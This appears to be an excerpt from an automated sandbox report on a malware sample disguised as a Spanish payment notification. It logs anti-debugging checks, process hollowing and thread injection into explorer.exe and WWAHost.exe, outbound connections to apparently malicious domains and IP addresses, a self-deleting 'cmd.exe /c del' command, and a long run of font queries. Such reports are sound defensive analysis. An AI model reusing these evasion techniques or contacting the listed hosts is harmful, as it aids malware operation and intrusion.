          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397C577 mov eax, dword ptr fs:[00000030h]14_2_0397C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396849B mov eax, dword ptr fs:[00000030h]14_2_0396849B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A114FB mov eax, dword ptr fs:[00000030h]14_2_03A114FB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6CF0 mov eax, dword ptr fs:[00000030h]14_2_039D6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A28CD6 mov eax, dword ptr fs:[00000030h]14_2_03A28CD6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039D6C0A mov eax, dword ptr fs:[00000030h]14_2_039D6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11C06 mov eax, dword ptr fs:[00000030h]14_2_03A11C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2740D mov eax, dword ptr fs:[00000030h]14_2_03A2740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398BC2C mov eax, dword ptr fs:[00000030h]14_2_0398BC2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]14_2_039EC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039EC450 mov eax, dword ptr fs:[00000030h]14_2_039EC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398A44B mov eax, dword ptr fs:[00000030h]14_2_0398A44B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397746D mov eax, dword ptr fs:[00000030h]14_2_0397746D
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040A130 LdrLoadDll,8_2_0040A130
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.195.7.239 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exeDomain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exeDomain query: www.evertribute.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1120000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeMemory written: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3968Jump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"Jump to behavior
          Source: explorer.exe, 0000000B.00000000.429405183.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.340340863.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.312051884.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.349900984.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.434835236.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.312120732.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.357378647.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.429478272.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
